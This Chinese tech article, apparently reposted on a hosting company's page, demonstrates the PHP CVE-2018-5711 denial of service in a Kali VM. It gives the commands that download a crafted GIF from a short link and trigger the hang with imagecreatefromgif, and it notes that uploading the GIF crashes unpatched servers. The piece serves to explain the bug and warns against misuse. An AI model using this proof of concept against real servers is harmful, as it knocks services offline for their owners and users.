广州睿东网络科技有限公司是国内最专业的香港空间,云主机,香港VPS,香港服务器租用提供商,专注为国内站长提供高速且稳定的香港空间,云主机,香港VPS,香港服务器租用,欢迎您的选购!
当前位置:首页 -> 香港主机 -> 独立IP空间

一张动图宕掉一台服务器!运维这个腊月又要忙了

云服务器 34℃ 1883评论
51CTO官微

本文来源:海阳顶端(今日头条作者)

原文链接:https://www.toutiao.com/a6514551846428738055/


台湾的黑客orange发现了一个漏洞,编号为PHP CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。


一、检测我的虚拟机是否装有php-gd库


1、运行命令:php -m | grep -i gd

2、如果上图中没有出现gd,我们就需要装一下了。运行命令apt-get install php-gd


二、生成恶意的gif文件


1、curl -L https://git.io/vN0n4 | xxd -r > poc.gif

2、运行top命令看下我的CPU使用率

3、测试恶意代码:

php -r imagecreatefromgif("poc.gif");

CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。


这个漏洞的影响版本范围如下:

PHP 5 < 5.6.33

PHP 7.0 < 7.0.27

PHP 7.1 < 7.1.13

PHP 7.2 < 7.2.1

如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。




  • 证实了!橘子皮真的能秒开你的手机!

  • CPU说:这个世界慢!死!了!

  • 你不知道的编程语言用途:造马 and 写作文

  • 程序员年终奖多少,你绝对猜不到